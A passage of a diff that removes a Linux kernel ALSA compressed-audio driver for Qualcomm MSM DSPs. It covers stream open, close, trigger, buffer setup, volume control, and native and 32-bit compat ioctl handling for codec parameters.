--	switch (compr->info.codec_param.codec.id) {
--	case SND_AUDIOCODEC_AMRWB:
--		pr_debug("q6asm_open_read(FORMAT_AMRWB)\n");
--		ret = q6asm_open_read(prtd->audio_client,
--				FORMAT_AMRWB);
--		if (ret < 0) {
--			pr_err("%s: compressed Session out open failed\n",
--					__func__);
--			return -ENOMEM;
--		}
--		pr_debug("msm_pcm_routing_reg_phy_stream\n");
--		msm_pcm_routing_reg_phy_stream(
--				soc_prtd->dai_link->be_id,
--				prtd->audio_client->perf_mode,
--				prtd->session_id, substream->stream);
--		break;
--	default:
--		pr_debug("q6asm_open_read_compressed(COMPRESSED_META_DATA_MODE)\n");
--		/*
--		   ret = q6asm_open_read_compressed(prtd->audio_client,
--		   MAX_NUM_FRAMES_PER_BUFFER,
--		   COMPRESSED_META_DATA_MODE);
--		 */
--			ret = -EINVAL;
--			break;
--	}
--
--	if (ret < 0) {
--		pr_err("%s: compressed Session out open failed\n",
--				__func__);
--		return -ENOMEM;
--	}
--
--	ret = q6asm_set_io_mode(prtd->audio_client,
--		(COMPRESSED_IO | ASYNC_IO_MODE));
--		if (ret < 0) {
--			pr_err("%s: Set IO mode failed\n", __func__);
--				return -ENOMEM;
--		}
--
--	if (!msm_compr_capture_codecs(codec->id)) {
--		/*
--		 * request codec invalid or not supported,
--		 * use default compress format
--		 */
--		codec->id = SND_AUDIOCODEC_AMRWB;
--	}
--	/* rate and channels are sent to audio driver */
--	prtd->samp_rate = runtime->rate;
--	prtd->channel_mode = runtime->channels;
--
--	if (prtd->enabled)
--		return ret;
--	read_param.len = prtd->pcm_count;
--
--	switch (codec->id) {
--	case SND_AUDIOCODEC_AMRWB:
--		pr_debug("SND_AUDIOCODEC_AMRWB\n");
--		ret = q6asm_enc_cfg_blk_amrwb(prtd->audio_client,
--			MAX_NUM_FRAMES_PER_BUFFER,
--			/*
--			 * use fixed band mode and dtx mode
--			 * band mode - 23.85 kbps
--			 */
--			AMR_WB_BAND_MODE,
--			/* dtx mode - disable */
--			AMR_WB_DTX_MODE);
--		if (ret < 0)
--			pr_err("%s: CMD Format block failed: %d\n",
--				__func__, ret);
--		break;
--	default:
--		pr_debug("No config for codec %d\n", codec->id);
--	}
--	pr_debug("%s: Samp_rate = %d, Channel = %d, pcm_size = %d,\n"
--			 "pcm_count = %d, periods = %d\n",
--			 __func__, prtd->samp_rate, prtd->channel_mode,
--			 prtd->pcm_size, prtd->pcm_count, runtime->periods);
--
--	for (i = 0; i < runtime->periods; i++) {
--		read_param.uid = i;
--		switch (codec->id) {
--		case SND_AUDIOCODEC_AMRWB:
--			read_param.len = prtd->pcm_count
--					- COMPRE_CAPTURE_HEADER_SIZE;
--			read_param.paddr = buf[i].phys
--					+ COMPRE_CAPTURE_HEADER_SIZE;
--			pr_debug("Push buffer [%d] to DSP, paddr: %pK, vaddr: %pK\n",
--					i, &read_param.paddr,
--					buf[i].data);
--			q6asm_async_read(prtd->audio_client, &read_param);
--			break;
--		default:
--			read_param.paddr = buf[i].phys;
--			/*q6asm_async_read_compressed(prtd->audio_client,
--				&read_param);*/
--			pr_debug("%s: To add support for read compressed\n",
--								__func__);
--			ret = -EINVAL;
--			break;
--		}
--	}
--	prtd->periods = runtime->periods;
--
--	prtd->enabled = 1;
--
--	return ret;
--}
--
--static int msm_compr_trigger(struct snd_pcm_substream *substream, int cmd)
--{
--	int ret = 0;
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct snd_soc_pcm_runtime *soc_prtd = substream->private_data;
--	struct compr_audio *compr = runtime->private_data;
--	struct msm_audio *prtd = &compr->prtd;
--
--	pr_debug("%s\n", __func__);
--	switch (cmd) {
--	case SNDRV_PCM_TRIGGER_START:
--		prtd->pcm_irq_pos = 0;
--
--		if (substream->stream == SNDRV_PCM_STREAM_CAPTURE) {
--			if (!msm_compr_capture_codecs(
--				compr->info.codec_param.codec.id)) {
--				/*
--				 * request codec invalid or not supported,
--				 * use default compress format
--				 */
--				compr->info.codec_param.codec.id =
--				SND_AUDIOCODEC_AMRWB;
--			}
--			switch (compr->info.codec_param.codec.id) {
--			case SND_AUDIOCODEC_AMRWB:
--				break;
--			default:
--				msm_pcm_routing_reg_psthr_stream(
--					soc_prtd->dai_link->be_id,
--					prtd->session_id, substream->stream);
--				break;
--			}
--		}
--		atomic_set(&prtd->pending_buffer, 1);
--	case SNDRV_PCM_TRIGGER_RESUME:
--	case SNDRV_PCM_TRIGGER_PAUSE_RELEASE:
--		pr_debug("%s: Trigger start\n", __func__);
--		q6asm_run_nowait(prtd->audio_client, 0, 0, 0);
--		atomic_set(&prtd->start, 1);
--		break;
--	case SNDRV_PCM_TRIGGER_STOP:
--		pr_debug("SNDRV_PCM_TRIGGER_STOP\n");
--		if (substream->stream == SNDRV_PCM_STREAM_CAPTURE) {
--			switch (compr->info.codec_param.codec.id) {
--			case SND_AUDIOCODEC_AMRWB:
--				break;
--			default:
--				msm_pcm_routing_reg_psthr_stream(
--					soc_prtd->dai_link->be_id,
--					prtd->session_id, substream->stream);
--				break;
--			}
--		}
--		atomic_set(&prtd->start, 0);
--		runtime->render_flag &= ~SNDRV_RENDER_STOPPED;
--		break;
--	case SNDRV_PCM_TRIGGER_SUSPEND:
--	case SNDRV_PCM_TRIGGER_PAUSE_PUSH:
--		pr_debug("SNDRV_PCM_TRIGGER_PAUSE\n");
--		q6asm_cmd_nowait(prtd->audio_client, CMD_PAUSE);
--		atomic_set(&prtd->start, 0);
--		runtime->render_flag &= ~SNDRV_RENDER_STOPPED;
--		break;
--	default:
--		ret = -EINVAL;
--		break;
--	}
--
--	return ret;
--}
--
--static void populate_codec_list(struct compr_audio *compr,
--		struct snd_pcm_runtime *runtime)
--{
--	pr_debug("%s\n", __func__);
--	/* MP3 Block */
--	compr->info.compr_cap.num_codecs = 5;
--	compr->info.compr_cap.min_fragment_size = runtime->hw.period_bytes_min;
--	compr->info.compr_cap.max_fragment_size = runtime->hw.period_bytes_max;
--	compr->info.compr_cap.min_fragments = runtime->hw.periods_min;
--	compr->info.compr_cap.max_fragments = runtime->hw.periods_max;
--	compr->info.compr_cap.codecs[0] = SND_AUDIOCODEC_MP3;
--	compr->info.compr_cap.codecs[1] = SND_AUDIOCODEC_AAC;
--	compr->info.compr_cap.codecs[2] = SND_AUDIOCODEC_AC3;
--	compr->info.compr_cap.codecs[3] = SND_AUDIOCODEC_EAC3;
--	compr->info.compr_cap.codecs[4] = SND_AUDIOCODEC_AMRWB;
--	/* Add new codecs here */
--}
--
--static int msm_compr_open(struct snd_pcm_substream *substream)
--{
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct compr_audio *compr;
--	struct msm_audio *prtd;
--	int ret = 0;
--
--	pr_debug("%s\n", __func__);
--	compr = kzalloc(sizeof(struct compr_audio), GFP_KERNEL);
--	if (compr == NULL) {
--		pr_err("Failed to allocate memory for msm_audio\n");
--		return -ENOMEM;
--	}
--	prtd = &compr->prtd;
--	prtd->substream = substream;
--	runtime->render_flag = SNDRV_DMA_MODE;
--	prtd->audio_client = q6asm_audio_client_alloc(
--				(app_cb)compr_event_handler, compr);
--	if (!prtd->audio_client) {
--		pr_info("%s: Could not allocate memory\n", __func__);
--		kfree(prtd);
--		return -ENOMEM;
--	}
--
--	prtd->audio_client->perf_mode = false;
--	pr_info("%s: session ID %d\n", __func__, prtd->audio_client->session);
--
--	prtd->session_id = prtd->audio_client->session;
--
--	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) {
--		runtime->hw = msm_compr_hardware_playback;
--		prtd->cmd_ack = 1;
--	} else {
--		runtime->hw = msm_compr_hardware_capture;
--	}
--
--
--	ret = snd_pcm_hw_constraint_list(runtime, 0,
--			SNDRV_PCM_HW_PARAM_RATE,
--			&constraints_sample_rates);
--	if (ret < 0)
--		pr_info("snd_pcm_hw_constraint_list failed\n");
--	/* Ensure that buffer size is a multiple of period size */
--	ret = snd_pcm_hw_constraint_integer(runtime,
--			    SNDRV_PCM_HW_PARAM_PERIODS);
--	if (ret < 0)
--		pr_info("snd_pcm_hw_constraint_integer failed\n");
--
--	prtd->dsp_cnt = 0;
--	atomic_set(&prtd->pending_buffer, 1);
--	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
--		compr->codec = FORMAT_MP3;
--	populate_codec_list(compr, runtime);
--	runtime->private_data = compr;
--	atomic_set(&prtd->eos, 0);
--	return 0;
--}
--
--static int compressed_set_volume(struct msm_audio *prtd, uint32_t volume)
--{
--	int rc = 0;
--	int avg_vol = 0;
--	int lgain = (volume >> 16) & 0xFFFF;
--	int rgain = volume & 0xFFFF;
--	if (prtd && prtd->audio_client) {
--		pr_debug("%s: channels %d volume 0x%x\n", __func__,
--			prtd->channel_mode, volume);
--		if ((prtd->channel_mode == 2) &&
--			(lgain != rgain)) {
--			pr_debug("%s: call q6asm_set_lrgain\n", __func__);
--			rc = q6asm_set_lrgain(prtd->audio_client, lgain, rgain);
--		} else {
--			avg_vol = (lgain + rgain)/2;
--			pr_debug("%s: call q6asm_set_volume\n", __func__);
--			rc = q6asm_set_volume(prtd->audio_client, avg_vol);
--		}
--		if (rc < 0) {
--			pr_err("%s: Send Volume command failed rc=%d\n",
--				__func__, rc);
--		}
--	}
--	return rc;
--}
--
--static int msm_compr_playback_close(struct snd_pcm_substream *substream)
--{
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct snd_soc_pcm_runtime *soc_prtd = substream->private_data;
--	struct compr_audio *compr = runtime->private_data;
--	struct msm_audio *prtd = &compr->prtd;
--	int dir = 0;
--
--	pr_debug("%s\n", __func__);
--
--	dir = IN;
--	atomic_set(&prtd->pending_buffer, 0);
--
--	prtd->pcm_irq_pos = 0;
--	q6asm_cmd(prtd->audio_client, CMD_CLOSE);
--	q6asm_audio_client_buf_free_contiguous(dir,
--				prtd->audio_client);
--		msm_pcm_routing_dereg_phy_stream(
--			soc_prtd->dai_link->be_id,
--			SNDRV_PCM_STREAM_PLAYBACK);
--	q6asm_audio_client_free(prtd->audio_client);
--	kfree(prtd);
--	return 0;
--}
--
--static int msm_compr_capture_close(struct snd_pcm_substream *substream)
--{
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct snd_soc_pcm_runtime *soc_prtd = substream->private_data;
--	struct compr_audio *compr = runtime->private_data;
--	struct msm_audio *prtd = &compr->prtd;
--	int dir = OUT;
--
--	pr_debug("%s\n", __func__);
--	atomic_set(&prtd->pending_buffer, 0);
--	q6asm_cmd(prtd->audio_client, CMD_CLOSE);
--	q6asm_audio_client_buf_free_contiguous(dir,
--				prtd->audio_client);
--	msm_pcm_routing_dereg_phy_stream(soc_prtd->dai_link->be_id,
--				SNDRV_PCM_STREAM_CAPTURE);
--	q6asm_audio_client_free(prtd->audio_client);
--	kfree(prtd);
--	return 0;
--}
--
--static int msm_compr_close(struct snd_pcm_substream *substream)
--{
--	int ret = 0;
--
--	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
--		ret = msm_compr_playback_close(substream);
--	else if (substream->stream == SNDRV_PCM_STREAM_CAPTURE)
--		ret = msm_compr_capture_close(substream);
--	return ret;
--}
--
--static int msm_compr_prepare(struct snd_pcm_substream *substream)
--{
--	int ret = 0;
--
--	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
--		ret = msm_compr_playback_prepare(substream);
--	else if (substream->stream == SNDRV_PCM_STREAM_CAPTURE)
--		ret = msm_compr_capture_prepare(substream);
--	return ret;
--}
--
--static snd_pcm_uframes_t msm_compr_pointer(struct snd_pcm_substream *substream)
--{
--
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct compr_audio *compr = runtime->private_data;
--	struct msm_audio *prtd = &compr->prtd;
--
--	if (prtd->pcm_irq_pos >= prtd->pcm_size)
--		prtd->pcm_irq_pos = 0;
--
--	pr_debug("%s: pcm_irq_pos = %d, pcm_size = %d, sample_bits = %d,\n"
--			 "frame_bits = %d\n", __func__, prtd->pcm_irq_pos,
--			 prtd->pcm_size, runtime->sample_bits,
--			 runtime->frame_bits);
--	return bytes_to_frames(runtime, (prtd->pcm_irq_pos));
--}
--
--static int msm_compr_mmap(struct snd_pcm_substream *substream,
--				struct vm_area_struct *vma)
--{
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct msm_audio *prtd = runtime->private_data;
--	struct audio_client *ac = prtd->audio_client;
--	struct audio_port_data *apd = ac->port;
--	struct audio_buffer *ab;
--	int dir = -1;
--
--	prtd->mmap_flag = 1;
--	runtime->render_flag = SNDRV_NON_DMA_MODE;
--	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
--		dir = IN;
--	else
--		dir = OUT;
--	ab = &(apd[dir].buf[0]);
--
--	return msm_audio_ion_mmap(ab, vma);
--}
--
--static int msm_compr_hw_params(struct snd_pcm_substream *substream,
--				struct snd_pcm_hw_params *params)
--{
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct compr_audio *compr = runtime->private_data;
--	struct msm_audio *prtd = &compr->prtd;
--	struct snd_dma_buffer *dma_buf = &substream->dma_buffer;
--	struct audio_buffer *buf;
--	int dir, ret;
--
--	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
--		dir = IN;
--	else
--		dir = OUT;
--	/* Modifying kernel hardware params based on userspace config */
--	if (params_periods(params) > 0 &&
--		(params_periods(params) != runtime->hw.periods_max)) {
--		runtime->hw.periods_max = params_periods(params);
--	}
--	if (params_period_bytes(params) > 0 &&
--		(params_period_bytes(params) != runtime->hw.period_bytes_min)) {
--		runtime->hw.period_bytes_min = params_period_bytes(params);
--	}
--	runtime->hw.buffer_bytes_max =
--			runtime->hw.period_bytes_min * runtime->hw.periods_max;
--	pr_debug("allocate %zd buffers each of size %d\n",
--		runtime->hw.period_bytes_min,
--		runtime->hw.periods_max);
--	ret = q6asm_audio_client_buf_alloc_contiguous(dir,
--			prtd->audio_client,
--			runtime->hw.period_bytes_min,
--			runtime->hw.periods_max);
--	if (ret < 0) {
--		pr_err("Audio Start: Buffer Allocation failed rc = %d\n",
--						ret);
--		return -ENOMEM;
--	}
--	buf = prtd->audio_client->port[dir].buf;
--
--	dma_buf->dev.type = SNDRV_DMA_TYPE_DEV;
--	dma_buf->dev.dev = substream->pcm->card->dev;
--	dma_buf->private_data = NULL;
--	dma_buf->area = buf[0].data;
--	dma_buf->addr =  buf[0].phys;
--	dma_buf->bytes = runtime->hw.buffer_bytes_max;
--
--	pr_debug("%s: buf[%pK]dma_buf->area[%pK]dma_buf->addr[%pK]\n"
--		 "dma_buf->bytes[%zd]\n", __func__,
--		 (void *)buf, (void *)dma_buf->area,
--		 &dma_buf->addr, dma_buf->bytes);
--	if (!dma_buf->area)
--		return -ENOMEM;
--
--	snd_pcm_set_runtime_buffer(substream, &substream->dma_buffer);
--	return 0;
--}
--
--static int msm_compr_ioctl_shared(struct snd_pcm_substream *substream,
--		unsigned int cmd, void *arg)
--{
--	int rc = 0;
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct compr_audio *compr = runtime->private_data;
--	struct msm_audio *prtd = &compr->prtd;
--	uint64_t timestamp;
--	uint64_t temp;
--
--	switch (cmd) {
--	case SNDRV_COMPRESS_TSTAMP: {
--		struct snd_compr_tstamp *tstamp;
--		pr_debug("SNDRV_COMPRESS_TSTAMP\n");
--		tstamp = arg;
--		memset(tstamp, 0x0, sizeof(*tstamp));
--		rc = q6asm_get_session_time(prtd->audio_client, &timestamp);
--		if (rc < 0) {
--			pr_err("%s: Get Session Time return value =%lld\n",
--				__func__, timestamp);
--			return -EAGAIN;
--		}
--		temp = (timestamp * 2 * runtime->channels);
--		temp = temp * (runtime->rate/1000);
--		temp = div_u64(temp, 1000);
--		tstamp->sampling_rate = runtime->rate;
--		tstamp->timestamp = timestamp;
--		pr_debug("%s: bytes_consumed:,timestamp = %lld,\n",
--						__func__,
--			tstamp->timestamp);
--		return 0;
--	}
--	case SNDRV_COMPRESS_GET_CAPS: {
--		struct snd_compr_caps *caps;
--		caps = arg;
--		memset(caps, 0, sizeof(*caps));
--		pr_debug("SNDRV_COMPRESS_GET_CAPS\n");
--		memcpy(caps, &compr->info.compr_cap, sizeof(*caps));
--		return 0;
--	}
--	case SNDRV_COMPRESS_SET_PARAMS:
--		pr_debug("SNDRV_COMPRESS_SET_PARAMS:\n");
--		memcpy(&compr->info.codec_param, (void *) arg,
--			sizeof(struct snd_compr_params));
--		switch (compr->info.codec_param.codec.id) {
--		case SND_AUDIOCODEC_MP3:
--			/* For MP3 we dont need any other parameter */
--			pr_debug("SND_AUDIOCODEC_MP3\n");
--			compr->codec = FORMAT_MP3;
--			break;
--		case SND_AUDIOCODEC_AAC:
--			pr_debug("SND_AUDIOCODEC_AAC\n");
--			compr->codec = FORMAT_MPEG4_AAC;
--			break;
--		case SND_AUDIOCODEC_AC3: {
--			char params_value[MAX_AC3_PARAM_SIZE];
--			int *params_value_data = (int *)params_value;
--			/* 36 is the max param length for ddp */
--			int i;
--			struct snd_dec_ddp *ddp =
--				&compr->info.codec_param.codec.options.ddp;
--			uint32_t params_length = 0;
--			memset(params_value, 0, MAX_AC3_PARAM_SIZE);
--			/* check integer overflow */
--			if (ddp->params_length > UINT_MAX/sizeof(int)) {
--				pr_err("%s: Integer overflow ddp->params_length %d\n",
--				__func__, ddp->params_length);
--				return -EINVAL;
--			}
--			params_length = ddp->params_length*sizeof(int);
--			if (params_length > MAX_AC3_PARAM_SIZE) {
--				/*MAX is 36*sizeof(int) this should not happen*/
--				pr_err("%s: params_length(%d) is greater than %zd\n",
--				__func__, params_length, MAX_AC3_PARAM_SIZE);
--				return -EINVAL;
--			}
--			pr_debug("SND_AUDIOCODEC_AC3\n");
--			compr->codec = FORMAT_AC3;
--			pr_debug("params_length: %d\n", ddp->params_length);
--			for (i = 0; i < params_length/sizeof(int); i++)
--				pr_debug("params_value[%d]: %x\n", i,
--					params_value_data[i]);
--			for (i = 0; i < ddp->params_length/2; i++) {
--				ddp->params_id[i] = params_value_data[2*i];
--				ddp->params_value[i] = params_value_data[2*i+1];
--			}
--			if (atomic_read(&prtd->start)) {
--				rc = msm_compr_send_ddp_cfg(prtd->audio_client,
--								ddp);
--				if (rc < 0)
--					pr_err("%s: DDP CMD CFG failed\n",
--						__func__);
--			}
--			break;
--		}
--		case SND_AUDIOCODEC_EAC3: {
--			char params_value[MAX_AC3_PARAM_SIZE];
--			int *params_value_data = (int *)params_value;
--			/* 36 is the max param length for ddp */
--			int i;
--			struct snd_dec_ddp *ddp =
--				&compr->info.codec_param.codec.options.ddp;
--			uint32_t params_length = 0;
--			memset(params_value, 0, MAX_AC3_PARAM_SIZE);
--			/* check integer overflow */
--			if (ddp->params_length > UINT_MAX/sizeof(int)) {
--				pr_err("%s: Integer overflow ddp->params_length %d\n",
--				__func__, ddp->params_length);
--				return -EINVAL;
--			}
--			params_length = ddp->params_length*sizeof(int);
--			if (params_length > MAX_AC3_PARAM_SIZE) {
--				/*MAX is 36*sizeof(int) this should not happen*/
--				pr_err("%s: params_length(%d) is greater than %zd\n",
--				__func__, params_length, MAX_AC3_PARAM_SIZE);
--				return -EINVAL;
--			}
--			pr_debug("SND_AUDIOCODEC_EAC3\n");
--			compr->codec = FORMAT_EAC3;
--			pr_debug("params_length: %d\n", ddp->params_length);
--			for (i = 0; i < ddp->params_length; i++)
--				pr_debug("params_value[%d]: %x\n", i,
--					params_value_data[i]);
--			for (i = 0; i < ddp->params_length/2; i++) {
--				ddp->params_id[i] = params_value_data[2*i];
--				ddp->params_value[i] = params_value_data[2*i+1];
--			}
--			if (atomic_read(&prtd->start)) {
--				rc = msm_compr_send_ddp_cfg(prtd->audio_client,
--								ddp);
--				if (rc < 0)
--					pr_err("%s: DDP CMD CFG failed\n",
--						__func__);
--			}
--			break;
--		}
--		default:
--			pr_debug("FORMAT_LINEAR_PCM\n");
--			compr->codec = FORMAT_LINEAR_PCM;
--			break;
--		}
--		return 0;
--	case SNDRV_PCM_IOCTL1_RESET:
--		pr_debug("SNDRV_PCM_IOCTL1_RESET\n");
--		/* Flush only when session is started during CAPTURE,
--		   while PLAYBACK has no such restriction. */
--		if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK ||
--			  (substream->stream == SNDRV_PCM_STREAM_CAPTURE &&
--						atomic_read(&prtd->start))) {
--			if (atomic_read(&prtd->eos)) {
--				prtd->cmd_interrupt = 1;
--				wake_up(&the_locks.eos_wait);
--				atomic_set(&prtd->eos, 0);
--			}
--
--			/* A unlikely race condition possible with FLUSH
--			   DRAIN if ack is set by flush and reset by drain */
--			prtd->cmd_ack = 0;
--			rc = q6asm_cmd(prtd->audio_client, CMD_FLUSH);
--			if (rc < 0) {
--				pr_err("%s: flush cmd failed rc=%d\n",
--					__func__, rc);
--				return rc;
--			}
--			rc = wait_event_timeout(the_locks.flush_wait,
--				prtd->cmd_ack, 5 * HZ);
--			if (!rc)
--				pr_err("Flush cmd timeout\n");
--			prtd->pcm_irq_pos = 0;
--		}
--		break;
--	case SNDRV_COMPRESS_DRAIN:
--		pr_debug("%s: SNDRV_COMPRESS_DRAIN\n", __func__);
--		if (atomic_read(&prtd->pending_buffer)) {
--			pr_debug("%s: no pending writes, drain would block\n",
--			 __func__);
--			return -EWOULDBLOCK;
--		}
--
--		atomic_set(&prtd->eos, 1);
--		atomic_set(&prtd->pending_buffer, 0);
--		prtd->cmd_ack = 0;
--		q6asm_cmd_nowait(prtd->audio_client, CMD_EOS);
--		/* Wait indefinitely for  DRAIN. Flush can also signal this*/
--		rc = wait_event_interruptible(the_locks.eos_wait,
--			(prtd->cmd_ack || prtd->cmd_interrupt));
--
--		if (rc < 0)
--			pr_err("EOS cmd interrupted\n");
--		pr_debug("%s: SNDRV_COMPRESS_DRAIN  out of wait\n", __func__);
--
--		if (prtd->cmd_interrupt)
--			rc = -EINTR;
--
--		prtd->cmd_interrupt = 0;
--		return rc;
--	default:
--		break;
--	}
--	return snd_pcm_lib_ioctl(substream, cmd, arg);
--}
--#ifdef CONFIG_COMPAT
--struct snd_enc_wma32 {
--	u32 super_block_align; /* WMA Type-specific data */
--	u32 encodeopt1;
--	u32 encodeopt2;
--};
--
--struct snd_enc_vorbis32 {
--	s32 quality;
--	u32 managed;
--	u32 max_bit_rate;
--	u32 min_bit_rate;
--	u32 downmix;
--};
--
--struct snd_enc_real32 {
--	u32 quant_bits;
--	u32 start_region;
--	u32 num_regions;
--};
--
--struct snd_enc_flac32 {
--	u32 num;
--	u32 gain;
--};
--
--struct snd_enc_generic32 {
--	u32 bw;	/* encoder bandwidth */
--	s32 reserved[15];
--};
--struct snd_dec_ddp32 {
--	u32 params_length;
--	u32 params_id[18];
--	u32 params_value[18];
--};
--
--union snd_codec_options32 {
--	struct snd_enc_wma32 wma;
--	struct snd_enc_vorbis32 vorbis;
--	struct snd_enc_real32 real;
--	struct snd_enc_flac32 flac;
--	struct snd_enc_generic32 generic;
--	struct snd_dec_ddp32 ddp;
--};
--
--struct snd_codec32 {
--	u32 id;
--	u32 ch_in;
--	u32 ch_out;
--	u32 sample_rate;
--	u32 bit_rate;
--	u32 rate_control;
--	u32 profile;
--	u32 level;
--	u32 ch_mode;
--	u32 format;
--	u32 align;
--	union snd_codec_options32 options;
--	u32 reserved[3];
--};
--
--struct snd_compressed_buffer32 {
--	u32 fragment_size;
--	u32 fragments;
--};
--
--struct snd_compr_params32 {
--	struct snd_compressed_buffer32 buffer;
--	struct snd_codec32 codec;
--	u8 no_wake_mode;
--};
--
--struct snd_compr_caps32 {
--	u32 num_codecs;
--	u32 direction;
--	u32 min_fragment_size;
--	u32 max_fragment_size;
--	u32 min_fragments;
--	u32 max_fragments;
--	u32 codecs[MAX_NUM_CODECS];
--	u32 reserved[11];
--};
--struct snd_compr_tstamp32 {
--	u32 byte_offset;
--	u32 copied_total;
--	compat_ulong_t pcm_frames;
--	compat_ulong_t pcm_io_frames;
--	u32 sampling_rate;
--	compat_u64 timestamp;
--};
--enum {
--	SNDRV_COMPRESS_TSTAMP32 = _IOR('C', 0x20, struct snd_compr_tstamp32),
--	SNDRV_COMPRESS_GET_CAPS32 = _IOWR('C', 0x10, struct snd_compr_caps32),
--	SNDRV_COMPRESS_SET_PARAMS32 =
--	_IOW('C', 0x12, struct snd_compr_params32),
--};
--static int msm_compr_compat_ioctl(struct snd_pcm_substream *substream,
--		unsigned int cmd, void *arg)
--{
--	int err = 0;
--	switch (cmd) {
--	case SNDRV_COMPRESS_TSTAMP32: {
--		struct snd_compr_tstamp tstamp;
--		struct snd_compr_tstamp32 tstamp32;
--		memset(&tstamp, 0, sizeof(tstamp));
--		memset(&tstamp32, 0, sizeof(tstamp32));
--		cmd = SNDRV_COMPRESS_TSTAMP;
--		err = msm_compr_ioctl_shared(substream, cmd, &tstamp);
--		if (err) {
--			pr_err("%s: COMPRESS_TSTAMP failed rc %d\n",
--			__func__, err);
--			goto bail_out;
--		}
--		tstamp32.byte_offset = tstamp.byte_offset;
--		tstamp32.copied_total = tstamp.copied_total;
--		tstamp32.pcm_frames = tstamp.pcm_frames;
--		tstamp32.pcm_io_frames = tstamp.pcm_io_frames;
--		tstamp32.sampling_rate = tstamp.sampling_rate;
--		tstamp32.timestamp = tstamp.timestamp;
--		if (copy_to_user(arg, &tstamp32, sizeof(tstamp32))) {
--			pr_err("%s: copytouser failed COMPRESS_TSTAMP32\n",
--			__func__);
--			err = -EFAULT;
--		}
--		break;
--	}
--	case SNDRV_COMPRESS_GET_CAPS32: {
--		struct snd_compr_caps caps;
--		struct snd_compr_caps32 caps32;
--		u32 i;
--		memset(&caps, 0, sizeof(caps));
--		memset(&caps32, 0, sizeof(caps32));
--		cmd = SNDRV_COMPRESS_GET_CAPS;
--		err = msm_compr_ioctl_shared(substream, cmd, &caps);
--		if (err) {
--			pr_err("%s: GET_CAPS failed rc %d\n",
--			__func__, err);
--			goto bail_out;
--		}
--		pr_debug("SNDRV_COMPRESS_GET_CAPS_32\n");
--		if (!err && caps.num_codecs >= MAX_NUM_CODECS) {
--			pr_err("%s: Invalid number of codecs\n", __func__);
--			err = -EINVAL;
--			goto bail_out;
--		}
--		caps32.direction = caps.direction;
--		caps32.max_fragment_size = caps.max_fragment_size;
--		caps32.max_fragments = caps.max_fragments;
--		caps32.min_fragment_size = caps.min_fragment_size;
--		caps32.num_codecs = caps.num_codecs;
--		for (i = 0; i < caps.num_codecs; i++)
--			caps32.codecs[i] = caps.codecs[i];
--		if (copy_to_user(arg, &caps32, sizeof(caps32))) {
--			pr_err("%s: copytouser failed COMPRESS_GETCAPS32\n",
--			__func__);
--			err = -EFAULT;
--		}
--		break;
--	}
--	case SNDRV_COMPRESS_SET_PARAMS32: {
--		struct snd_compr_params32 params32;
--		struct snd_compr_params params;
--		memset(&params32, 0 , sizeof(params32));
--		memset(&params, 0 , sizeof(params));
--		cmd = SNDRV_COMPRESS_SET_PARAMS;
--		if (copy_from_user(&params32, arg, sizeof(params32))) {
--			pr_err("%s: copyfromuser failed SET_PARAMS32\n",
--			__func__);
--			err = -EFAULT;
--			goto bail_out;
--		}
--		params.no_wake_mode = params32.no_wake_mode;
--		params.codec.id = params32.codec.id;
--		params.codec.ch_in = params32.codec.ch_in;
--		params.codec.ch_out = params32.codec.ch_out;
--		params.codec.sample_rate = params32.codec.sample_rate;
--		params.codec.bit_rate = params32.codec.bit_rate;
--		params.codec.rate_control = params32.codec.rate_control;
--		params.codec.profile = params32.codec.profile;
--		params.codec.level = params32.codec.level;
--		params.codec.ch_mode = params32.codec.ch_mode;
--		params.codec.format = params32.codec.format;
--		params.codec.align = params32.codec.align;
--
--		switch (params.codec.id) {
--		case SND_AUDIOCODEC_WMA:
--		case SND_AUDIOCODEC_WMA_PRO:
--			params.codec.options.wma.encodeopt1 =
--			params32.codec.options.wma.encodeopt1;
--			params.codec.options.wma.encodeopt2 =
--			params32.codec.options.wma.encodeopt2;
--			params.codec.options.wma.super_block_align =
--			params32.codec.options.wma.super_block_align;
--		break;
--		case SND_AUDIOCODEC_VORBIS:
--			params.codec.options.vorbis.downmix =
--			params32.codec.options.vorbis.downmix;
--			params.codec.options.vorbis.managed =
--			params32.codec.options.vorbis.managed;
--			params.codec.options.vorbis.max_bit_rate =
--			params32.codec.options.vorbis.max_bit_rate;
--			params.codec.options.vorbis.min_bit_rate =
--			params32.codec.options.vorbis.min_bit_rate;
--			params.codec.options.vorbis.quality =
--			params32.codec.options.vorbis.quality;
--		break;
--		case SND_AUDIOCODEC_REAL:
--			params.codec.options.real.num_regions =
--			params32.codec.options.real.num_regions;
--			params.codec.options.real.quant_bits =
--			params32.codec.options.real.quant_bits;
--			params.codec.options.real.start_region =
--			params32.codec.options.real.start_region;
--		break;
--		case SND_AUDIOCODEC_FLAC:
--			params.codec.options.flac.gain =
--			params32.codec.options.flac.gain;
--			params.codec.options.flac.num =
--			params32.codec.options.flac.num;
--		break;
--		case SND_AUDIOCODEC_DTS:
--		case SND_AUDIOCODEC_DTS_PASS_THROUGH:
--		case SND_AUDIOCODEC_DTS_LBR:
--		case SND_AUDIOCODEC_DTS_LBR_PASS_THROUGH:
--		case SND_AUDIOCODEC_DTS_TRANSCODE_LOOPBACK:
--		break;
--		case SND_AUDIOCODEC_AC3:
--		case SND_AUDIOCODEC_EAC3:
--			params.codec.options.ddp.params_length =
--			params32.codec.options.ddp.params_length;
--			memcpy(params.codec.options.ddp.params_value,
--			params32.codec.options.ddp.params_value,
--			sizeof(params32.codec.options.ddp.params_value));
--			memcpy(params.codec.options.ddp.params_id,
--			params32.codec.options.ddp.params_id,
--			sizeof(params32.codec.options.ddp.params_id));
--		break;
--		default:
--			params.codec.options.generic.bw =
--			params32.codec.options.generic.bw;
--		break;
--		}
--		if (!err)
